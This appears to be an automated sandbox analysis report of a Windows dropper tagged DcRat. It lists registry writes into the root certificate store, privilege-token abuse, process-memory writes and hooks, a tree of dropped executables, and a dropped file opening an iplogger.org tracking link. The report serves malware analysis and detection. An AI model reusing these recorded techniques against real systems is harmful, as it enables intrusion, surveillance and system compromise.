414141436572746966696361746553657276696365732e63726c300d06092a864886f70d010105050003820101000856fc02f09be8ffa4fad67bc64480ce4fc4c5f60058cca6b6bc1449680476e8e6ee5dec020f60d68d50184f264e01e3e6b0a5eebfbc745441bffdfc12b8c74f5af48960057f60b7054af3f6f1c2bfc4b97486b62d7d6bccd2f346dd2fc6e06ac3c334032c7d96dd5ac20ea70a99c1058bab0c2ff35c3acf6c37550987de53406c58effcb6ab656e04f61bdc3ce05a15c69ed9f15948302165036cece92173ec9b03a1e037ada015188ffaba02cea72ca910132cd4e50826ab229760f8905e74d4a29a53bdf2a968e0a26ec2d76cb1a30f9ebfeb68e756f2aef2e32b383a0981b56b85d7be2ded3f1ab7b263e2f5622c82d46a004150f139839f95e93696986e 1RtnrOsPJsTdMrVTQK_5xpeq.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 1900000001000000100000002aa1c05e2ae606f198c2c5e937c97aa20f00000001000000140000003e8e6487f8fd27d322a269a71edaac5d57811286090000000100000054000000305206082b0601050507030206082b06010505070303060a2b0601040182370a030406082b0601050507030406082b0601050507030606082b0601050507030706082b0601050507030106082b0601050507030853000000010000004300000030413022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0620000000100000020000000d7a7a0fb5d7e2731d771e9484ebcdef71d5f0c3e0a2948782bc83ee0ea699ef40b000000010000001c0000005300650063007400690067006f002000280041004100410029000000140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b41d00000001000000100000002e0d6875874a44c820912e85e964cfdb030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e349040000000100000010000000497904b0eb8719ac47b0bc11519b74d0200000000100000036040000308204323082031aa003020102020101300d06092a864886f70d0101050500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c1841414120436572746966696361746520536572766963657330820122300d06092a864886f70d01010105000382010f003082010a0282010100be409df46ee1ea76871c4d45448ebe46c883069dc12afe181f8ee402faf3ab5d508a16310b9a06d0c57022cd492d5463ccb66e68460b53eacb4c24c0bc724eeaf115aef4549a120ac37ab23360e2da8955f32258f3dedccfef8386a28c944f9f68f29890468427c776bfe3cc352c8b5e07646582c048b0a891f9619f762050a891c766b5eb78620356f08a1a13ea31a31ea099fd38f6f62732586f07f56bb8fb142bafb7aaccd6635f738cda0599a838a8cb17783651ace99ef4783a8dcf0fd942e2980cab2f9f0e01deef9f9949f12ddfac744d1b98b547c5e529d1f99018c7629cbe83c7267b3e8a25c7c0dd9de6356810209d8fd8ded2c3849c0d5ee82fc90203010001a381c03081bd301d0603551d0e04160414a0110a233e96f107ece2af29ef82a57fd030a4b4300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff307b0603551d1f047430723038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c3036a034a0328630687474703a2f2f63726c2e636f6d6f646f2e6e65742f414141436572746966696361746553657276696365732e63726c300d06092a864886f70d010105050003820101000856fc02f09be8ffa4fad67bc64480ce4fc4c5f60058cca6b6bc1449680476e8e6ee5dec020f60d68d50184f264e01e3e6b0a5eebfbc745441bffdfc12b8c74f5af48960057f60b7054af3f6f1c2bfc4b97486b62d7d6bccd2f346dd2fc6e06ac3c334032c7d96dd5ac20ea70a99c1058bab0c2ff35c3acf6c37550987de53406c58effcb6ab656e04f61bdc3ce05a15c69ed9f15948302165036cece92173ec9b03a1e037ada015188ffaba02cea72ca910132cd4e50826ab229760f8905e74d4a29a53bdf2a968e0a26ec2d76cb1a30f9ebfeb68e756f2aef2e32b383a0981b56b85d7be2ded3f1ab7b263e2f5622c82d46a004150f139839f95e93696986e 1RtnrOsPJsTdMrVTQK_5xpeq.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 5c000000010000000400000000080000040000000100000010000000497904b0eb8719ac47b0bc11519b74d0030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e3491d00000001000000100000002e0d6875874a44c820912e85e964cfdb140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b40b000000010000001c0000005300650063007400690067006f002000280041004100410029000000620000000100000020000000d7a7a0fb5d7e2731d771e9484ebcdef71d5f0c3e0a2948782bc83ee0ea699ef453000000010000004300000030413022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0090000000100000054000000305206082b0601050507030206082b06010505070303060a2b0601040182370a030406082b0601050507030406082b0601050507030606082b0601050507030706082b0601050507030106082b060105050703080f00000001000000140000003e8e6487f8fd27d322a269a71edaac5d578112861900000001000000100000002aa1c05e2ae606f198c2c5e937c97aa2200000000100000036040000308204323082031aa003020102020101300d06092a864886f70d0101050500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c1841414120436572746966696361746520536572766963657330820122300d06092a864886f70d01010105000382010f003082010a0282010100be409df46ee1ea76871c4d45448ebe46c883069dc12afe181f8ee402faf3ab5d508a16310b9a06d0c57022cd492d5463ccb66e68460b53eacb4c24c0bc724eeaf115aef4549a120ac37ab23360e2da8955f32258f3dedccfef8386a28c944f9f68f29890468427c776bfe3cc352c8b5e07646582c048b0a891f9619f762050a891c766b5eb78620356f08a1a13ea31a31ea099fd38f6f62732586f07f56bb8fb142bafb7aaccd6635f738cda0599a838a8cb17783651ace99ef4783a8dcf0fd942e2980cab2f9f0e01deef9f9949f12ddfac744d1b98b547c5e529d1f99018c7629cbe83c7267b3e8a25c7c0dd9de6356810209d8fd8ded2c3849c0d5ee82fc90203010001a381c03081bd301d0603551d0e04160414a0110a233e96f107ece2af29ef82a57fd030a4b4300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff307b0603551d1f047430723038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c3036a034a0328630687474703a2f2f63726c2e636f6d6f646f2e6e65742f414141436572746966696361746553657276696365732e63726c300d06092a864886f70d010105050003820101000856fc02f09be8ffa4fad67bc64480ce4fc4c5f60058cca6b6bc1449680476e8e6ee5dec020f60d68d50184f264e01e3e6b0a5eebfbc745441bffdfc12b8c74f5af48960057f60b7054af3f6f1c2bfc4b97486b62d7d6bccd2f346dd2fc6e06ac3c334032c7d96dd5ac20ea70a99c1058bab0c2ff35c3acf6c37550987de53406c58effcb6ab656e04f61bdc3ce05a15c69ed9f15948302165036cece92173ec9b03a1e037ada015188ffaba02cea72ca910132cd4e50826ab229760f8905e74d4a29a53bdf2a968e0a26ec2d76cb1a30f9ebfeb68e756f2aef2e32b383a0981b56b85d7be2ded3f1ab7b263e2f5622c82d46a004150f139839f95e93696986e 1RtnrOsPJsTdMrVTQK_5xpeq.exe -
Suspicious behavior: EnumeratesProcesses 64 IoCs
Processes:
pub2.exemsedge.exemsedge.exemsedge.exejfiag3g_gg.exepid process 4980 pub2.exe 4980 pub2.exe 5048 msedge.exe 5048 msedge.exe 4056 msedge.exe 4056 msedge.exe 4872 msedge.exe 4872 msedge.exe 4292 jfiag3g_gg.exe 4292 jfiag3g_gg.exe 2232 2232 2232 2232 2232 2232 2232 2232 2232 2232 2232 2232 2232 2232 2232 2232 2232 2232 2232 2232 2232 2232 2232 2232 2232 2232 2232 2232 2232 2232 2232 2232 2232 2232 2232 2232 2232 2232 2232 2232 2232 2232 2232 2232 2232 2232 2232 2232 2232 2232 2232 2232 2232 2232 -
Suspicious behavior: MapViewOfSection 2 IoCs
Processes:
pub2.exettthwfepid process 4980 pub2.exe 4116 ttthwfe -
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 5 IoCs
Processes:
msedge.exepid process 4872 msedge.exe 4872 msedge.exe 4872 msedge.exe 4872 msedge.exe 4872 msedge.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
Processes:
KRSetp.exeInstallation.exetaskkill.exesvchost.exejg3_3uag.exedescription pid process Token: SeDebugPrivilege 4160 KRSetp.exe Token: SeCreateTokenPrivilege 4252 Installation.exe Token: SeAssignPrimaryTokenPrivilege 4252 Installation.exe Token: SeLockMemoryPrivilege 4252 Installation.exe Token: SeIncreaseQuotaPrivilege 4252 Installation.exe Token: SeMachineAccountPrivilege 4252 Installation.exe Token: SeTcbPrivilege 4252 Installation.exe Token: SeSecurityPrivilege 4252 Installation.exe Token: SeTakeOwnershipPrivilege 4252 Installation.exe Token: SeLoadDriverPrivilege 4252 Installation.exe Token: SeSystemProfilePrivilege 4252 Installation.exe Token: SeSystemtimePrivilege 4252 Installation.exe Token: SeProfSingleProcessPrivilege 4252 Installation.exe Token: SeIncBasePriorityPrivilege 4252 Installation.exe Token: SeCreatePagefilePrivilege 4252 Installation.exe Token: SeCreatePermanentPrivilege 4252 Installation.exe Token: SeBackupPrivilege 4252 Installation.exe Token: SeRestorePrivilege 4252 Installation.exe Token: SeShutdownPrivilege 4252 Installation.exe Token: SeDebugPrivilege 4252 Installation.exe Token: SeAuditPrivilege 4252 Installation.exe Token: SeSystemEnvironmentPrivilege 4252 Installation.exe Token: SeChangeNotifyPrivilege 4252 Installation.exe Token: SeRemoteShutdownPrivilege 4252 Installation.exe Token: SeUndockPrivilege 4252 Installation.exe Token: SeSyncAgentPrivilege 4252 Installation.exe Token: SeEnableDelegationPrivilege 4252 Installation.exe Token: SeManageVolumePrivilege 4252 Installation.exe Token: SeImpersonatePrivilege 4252 Installation.exe Token: SeCreateGlobalPrivilege 4252 Installation.exe Token: 31 4252 Installation.exe Token: 32 4252 Installation.exe Token: 33 4252 Installation.exe Token: 34 4252 Installation.exe Token: 35 4252 Installation.exe Token: SeDebugPrivilege 3324 taskkill.exe Token: SeShutdownPrivilege 2232 Token: SeCreatePagefilePrivilege 2232 Token: SeShutdownPrivilege 2232 Token: SeCreatePagefilePrivilege 2232 Token: SeShutdownPrivilege 2232 Token: SeCreatePagefilePrivilege 2232 Token: SeShutdownPrivilege 2232 Token: SeCreatePagefilePrivilege 2232 Token: SeShutdownPrivilege 2232 Token: SeCreatePagefilePrivilege 2232 Token: SeShutdownPrivilege 2232 Token: SeCreatePagefilePrivilege 2232 Token: SeShutdownPrivilege 2232 Token: SeCreatePagefilePrivilege 2232 Token: SeShutdownPrivilege 2232 Token: SeCreatePagefilePrivilege 2232 Token: SeShutdownPrivilege 2232 Token: SeCreatePagefilePrivilege 2232 Token: SeShutdownPrivilege 2232 Token: SeCreatePagefilePrivilege 2232 Token: SeTcbPrivilege 4100 svchost.exe Token: SeTcbPrivilege 4100 svchost.exe Token: SeTcbPrivilege 4100 svchost.exe Token: SeTcbPrivilege 4100 svchost.exe Token: SeTcbPrivilege 4100 svchost.exe Token: SeManageVolumePrivilege 4172 jg3_3uag.exe Token: SeShutdownPrivilege 2232 Token: SeCreatePagefilePrivilege 2232 -
Suspicious use of FindShellTrayWindow 29 IoCs
Processes:
File.exemsedge.exeAccostarmi.exe.pifpid process 3120 File.exe 3120 File.exe 3120 File.exe 3120 File.exe 3120 File.exe 3120 File.exe 4872 msedge.exe 4872 msedge.exe 2232 4872 msedge.exe 2232 2232 2232 2232 5248 Accostarmi.exe.pif 2232 2232 5248 Accostarmi.exe.pif 5248 Accostarmi.exe.pif 2232 2232 2232 2232 2232 2232 2232 2232 2232 2232 -
Suspicious use of SendNotifyMessage 9 IoCs
Processes:
File.exeAccostarmi.exe.pifpid process 3120 File.exe 3120 File.exe 3120 File.exe 3120 File.exe 3120 File.exe 3120 File.exe 5248 Accostarmi.exe.pif 5248 Accostarmi.exe.pif 5248 Accostarmi.exe.pif -
Suspicious use of SetWindowsHookEx 15 IoCs
Processes:
Info.exeQ9TMJHcyWJ57WbegY93a0ML8.exerAygDhsCG3o6w9CTNCgqbkYH.exe88_AKQYj8XKniHVblGMGInY1.exeHiCCOQU8W2MgCEoQfgwK62LY.exe1RtnrOsPJsTdMrVTQK_5xpeq.exeFrkWCoBi3Z2dPBaJvUIiG48f.exenn3clCgMOnoaDCpiVeYozBOV.exev0Bp_MkdSi3FaqCdJ94sVkiH.exeschtasks.exepLi5dA69x4EhZad08LfBG3Z2.exez9bHtF5UDDCm2VBLh0RUU9Hi.exeInstall.exeInstall.exeAccostarmi.exe.pifpid process 1512 Info.exe 2984 Q9TMJHcyWJ57WbegY93a0ML8.exe 5960 rAygDhsCG3o6w9CTNCgqbkYH.exe 5948 88_AKQYj8XKniHVblGMGInY1.exe 6012 HiCCOQU8W2MgCEoQfgwK62LY.exe 4048 1RtnrOsPJsTdMrVTQK_5xpeq.exe 6084 FrkWCoBi3Z2dPBaJvUIiG48f.exe 5884 nn3clCgMOnoaDCpiVeYozBOV.exe 5140 v0Bp_MkdSi3FaqCdJ94sVkiH.exe 6060 schtasks.exe 3496 pLi5dA69x4EhZad08LfBG3Z2.exe 1540 z9bHtF5UDDCm2VBLh0RUU9Hi.exe 5956 Install.exe 3476 Install.exe 5248 Accostarmi.exe.pif -
Suspicious use of WriteProcessMemory 64 IoCs
Processes:
60fab284bebc82de2442c309a7b9ba7f3134dcef7e76345ec71ff4cf0af9adb3.exeFiles.exemsedge.exepzyh.exemsedge.exeInstallation.execmd.exedescription pid process target process PID 4720 wrote to memory of 3656 4720 60fab284bebc82de2442c309a7b9ba7f3134dcef7e76345ec71ff4cf0af9adb3.exe Files.exe PID 4720 wrote to memory of 3656 4720 60fab284bebc82de2442c309a7b9ba7f3134dcef7e76345ec71ff4cf0af9adb3.exe Files.exe PID 4720 wrote to memory of 3656 4720 60fab284bebc82de2442c309a7b9ba7f3134dcef7e76345ec71ff4cf0af9adb3.exe Files.exe PID 4720 wrote to memory of 3612 4720 60fab284bebc82de2442c309a7b9ba7f3134dcef7e76345ec71ff4cf0af9adb3.exe Install.exe PID 4720 wrote to memory of 3612 4720 60fab284bebc82de2442c309a7b9ba7f3134dcef7e76345ec71ff4cf0af9adb3.exe Install.exe PID 4720 wrote to memory of 3612 4720 60fab284bebc82de2442c309a7b9ba7f3134dcef7e76345ec71ff4cf0af9adb3.exe Install.exe PID 4720 wrote to memory of 4160 4720 60fab284bebc82de2442c309a7b9ba7f3134dcef7e76345ec71ff4cf0af9adb3.exe KRSetp.exe PID 4720 wrote to memory of 4160 4720 60fab284bebc82de2442c309a7b9ba7f3134dcef7e76345ec71ff4cf0af9adb3.exe KRSetp.exe PID 4720 wrote to memory of 4172 4720 60fab284bebc82de2442c309a7b9ba7f3134dcef7e76345ec71ff4cf0af9adb3.exe jg3_3uag.exe PID 4720 wrote to memory of 4172 4720 60fab284bebc82de2442c309a7b9ba7f3134dcef7e76345ec71ff4cf0af9adb3.exe jg3_3uag.exe PID 4720 wrote to memory of 4172 4720 60fab284bebc82de2442c309a7b9ba7f3134dcef7e76345ec71ff4cf0af9adb3.exe jg3_3uag.exe PID 3656 wrote to memory of 3120 3656 Files.exe File.exe PID 3656 wrote to memory of 3120 3656 Files.exe File.exe PID 3656 wrote to memory of 3120 3656 Files.exe File.exe PID 4720 wrote to memory of 4620 4720 60fab284bebc82de2442c309a7b9ba7f3134dcef7e76345ec71ff4cf0af9adb3.exe msedge.exe PID 4720 wrote to memory of 4620 4720 60fab284bebc82de2442c309a7b9ba7f3134dcef7e76345ec71ff4cf0af9adb3.exe msedge.exe PID 4620 wrote to memory of 560 4620 msedge.exe msedge.exe PID 4620 wrote to memory of 560 4620 msedge.exe msedge.exe PID 4720 wrote to memory of 4660 4720 60fab284bebc82de2442c309a7b9ba7f3134dcef7e76345ec71ff4cf0af9adb3.exe Folder.exe PID 4720 wrote to memory of 4660 4720 60fab284bebc82de2442c309a7b9ba7f3134dcef7e76345ec71ff4cf0af9adb3.exe Folder.exe PID 4720 wrote to memory of 4660 4720 60fab284bebc82de2442c309a7b9ba7f3134dcef7e76345ec71ff4cf0af9adb3.exe Folder.exe PID 4720 wrote to memory of 4252 4720 60fab284bebc82de2442c309a7b9ba7f3134dcef7e76345ec71ff4cf0af9adb3.exe Installation.exe PID 4720 wrote to memory of 4252 4720 60fab284bebc82de2442c309a7b9ba7f3134dcef7e76345ec71ff4cf0af9adb3.exe Installation.exe PID 4720 wrote to memory of 4252 4720 60fab284bebc82de2442c309a7b9ba7f3134dcef7e76345ec71ff4cf0af9adb3.exe Installation.exe PID 4720 wrote to memory of 4452 4720 60fab284bebc82de2442c309a7b9ba7f3134dcef7e76345ec71ff4cf0af9adb3.exe pzyh.exe PID 4720 wrote to memory of 4452 4720 60fab284bebc82de2442c309a7b9ba7f3134dcef7e76345ec71ff4cf0af9adb3.exe pzyh.exe PID 4720 wrote to memory of 4452 4720 60fab284bebc82de2442c309a7b9ba7f3134dcef7e76345ec71ff4cf0af9adb3.exe pzyh.exe PID 4720 wrote to memory of 4980 4720 60fab284bebc82de2442c309a7b9ba7f3134dcef7e76345ec71ff4cf0af9adb3.exe pub2.exe PID 4720 wrote to memory of 4980 4720 60fab284bebc82de2442c309a7b9ba7f3134dcef7e76345ec71ff4cf0af9adb3.exe pub2.exe PID 4720 wrote to memory of 4980 4720 60fab284bebc82de2442c309a7b9ba7f3134dcef7e76345ec71ff4cf0af9adb3.exe pub2.exe PID 4720 wrote to memory of 1512 4720 60fab284bebc82de2442c309a7b9ba7f3134dcef7e76345ec71ff4cf0af9adb3.exe Info.exe PID 4720 wrote to memory of 1512 4720 60fab284bebc82de2442c309a7b9ba7f3134dcef7e76345ec71ff4cf0af9adb3.exe Info.exe PID 4720 wrote to memory of 1512 4720 60fab284bebc82de2442c309a7b9ba7f3134dcef7e76345ec71ff4cf0af9adb3.exe Info.exe PID 4452 wrote to memory of 4924 4452 pzyh.exe jfiag3g_gg.exe PID 4452 wrote to memory of 4924 4452 pzyh.exe jfiag3g_gg.exe PID 4452 wrote to memory of 4924 4452 pzyh.exe jfiag3g_gg.exe PID 3656 wrote to memory of 4872 3656 Files.exe msedge.exe PID 3656 wrote to memory of 4872 3656 Files.exe msedge.exe PID 4872 wrote to memory of 1656 4872 msedge.exe msedge.exe PID 4872 wrote to memory of 1656 4872 msedge.exe msedge.exe PID 4252 wrote to memory of 484 4252 Installation.exe cmd.exe PID 4252 wrote to memory of 484 4252 Installation.exe cmd.exe PID 4252 wrote to memory of 484 4252 Installation.exe cmd.exe PID 484 wrote to memory of 3324 484 cmd.exe taskkill.exe PID 484 wrote to memory of 3324 484 cmd.exe taskkill.exe PID 484 wrote to memory of 3324 484 cmd.exe taskkill.exe PID 4872 wrote to memory of 364 4872 msedge.exe msedge.exe PID 4872 wrote to memory of 364 4872 msedge.exe msedge.exe PID 4872 wrote to memory of 364 4872 msedge.exe msedge.exe PID 4872 wrote to memory of 364 4872 msedge.exe msedge.exe PID 4872 wrote to memory of 364 4872 msedge.exe msedge.exe PID 4872 wrote to memory of 364 4872 msedge.exe msedge.exe PID 4872 wrote to memory of 364 4872 msedge.exe msedge.exe PID 4872 wrote to memory of 364 4872 msedge.exe msedge.exe PID 4872 wrote to memory of 364 4872 msedge.exe msedge.exe PID 4872 wrote to memory of 364 4872 msedge.exe msedge.exe PID 4872 wrote to memory of 364 4872 msedge.exe msedge.exe PID 4872 wrote to memory of 364 4872 msedge.exe msedge.exe PID 4872 wrote to memory of 364 4872 msedge.exe msedge.exe PID 4872 wrote to memory of 364 4872 msedge.exe msedge.exe PID 4872 wrote to memory of 364 4872 msedge.exe msedge.exe PID 4872 wrote to memory of 364 4872 msedge.exe msedge.exe PID 4872 wrote to memory of 364 4872 msedge.exe msedge.exe PID 4872 wrote to memory of 364 4872 msedge.exe msedge.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\60fab284bebc82de2442c309a7b9ba7f3134dcef7e76345ec71ff4cf0af9adb3.exe"C:\Users\Admin\AppData\Local\Temp\60fab284bebc82de2442c309a7b9ba7f3134dcef7e76345ec71ff4cf0af9adb3.exe"1⤵
- DcRat
- Checks computer location settings
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\Files.exe"C:\Users\Admin\AppData\Local\Temp\Files.exe"2⤵
- Executes dropped EXE
- Checks computer location settings
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\RarSFX0\File.exe"C:\Users\Admin\AppData\Local\Temp\RarSFX0\File.exe"3⤵
- Executes dropped EXE
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://iplogger.org/1Rxji73⤵
- Adds Run key to start application
- Enumerates system info in registry
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of FindShellTrayWindow
- Suspicious use of WriteProcessMemory
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x104,0x108,0x10c,0xd4,0x110,0x7ffadc3246f8,0x7ffadc324708,0x7ffadc3247184⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2092,8829292395367179715,3033824808104068189,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2184 /prefetch:34⤵
- Suspicious behavior: EnumeratesProcesses
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2092,8829292395367179715,3033824808104068189,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2108 /prefetch:24⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2092,8829292395367179715,3033824808104068189,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2664 /prefetch:84⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2092,8829292395367179715,3033824808104068189,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3652 /prefetch:14⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2092,8829292395367179715,3033824808104068189,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3660 /prefetch:14⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2092,8829292395367179715,3033824808104068189,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4352 /prefetch:14⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=2092,8829292395367179715,3033824808104068189,131072 --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=5368 /prefetch:84⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2092,8829292395367179715,3033824808104068189,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5888 /prefetch:14⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2092,8829292395367179715,3033824808104068189,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5892 /prefetch:14⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2092,8829292395367179715,3033824808104068189,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=6468 /prefetch:84⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\Installer\setup.exe"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\Installer\setup.exe" --configure-user-settings --verbose-logging --system-level --msedge --force-configure-user-settings4⤵
- Drops file in Program Files directory
-
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\Installer\setup.exe"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\Installer\setup.exe" --type=crashpad-handler /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler --database=C:\Windows\TEMP\MsEdgeCrashpad --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\Installer\setup.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x220,0x224,0x228,0x1fc,0x22c,0x7ff7b4715460,0x7ff7b4715470,0x7ff7b47154805⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2092,8829292395367179715,3033824808104068189,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=6468 /prefetch:84⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2092,8829292395367179715,3033824808104068189,131072 --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=5140 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.19041.546 --gpu-preferences=UAAAAAAAAADoAAAQAAAAAAAAAAAAAAAAAABgAAAEAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=4360 /prefetch:24⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=2092,8829292395367179715,3033824808104068189,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5424 /prefetch:84⤵
-
C:\Users\Admin\AppData\Local\Temp\Install.exe"C:\Users\Admin\AppData\Local\Temp\Install.exe"2⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3612 -s 6203⤵
